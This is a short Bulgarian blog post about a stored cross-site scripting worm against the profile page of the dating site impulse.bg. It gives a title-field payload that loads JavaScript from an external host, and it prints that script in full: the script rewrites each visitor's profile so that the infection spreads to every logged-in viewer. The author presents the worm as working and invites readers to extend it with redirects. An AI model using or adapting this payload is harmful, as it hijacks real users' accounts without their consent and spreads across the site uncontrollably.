impulse.bg позволява използването на HTML в “title”, точно както прави myspace.com с малката разлика, че няма забрани.
Веднага прави впечатление, това:
GET /js/scriptaculous/scriptaculous.js
което само по себе си прави нашето занимание по-лесно и красиво. Поставяйки в “Заглавие” полето нещо от рода на:
{script src=”www.mysite.com/impulse.js”}{/script}
impulse.js contents:
var params = “name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&
city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&
search_gender=2&height=0&weight=0&eyes=0&hair=0&
occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src
%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&
info=&msg_report=1&comment_report=1&
Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8”;
var MyAjax = new Ajax.Request (‘/myinfo’, {
method: ‘post’,
parameters: params
});
резултат:
при всяко посещение на “заразения” профил…всички логнати в с-мата ще бъдат също заразени…така до безкрайност…за ефекност бихме могли да променим джаваскрипт кода като сложим екстри от рода на window.location=. Creativity is the key. 😉
Filed under: security, web, XSS | 1 Comment »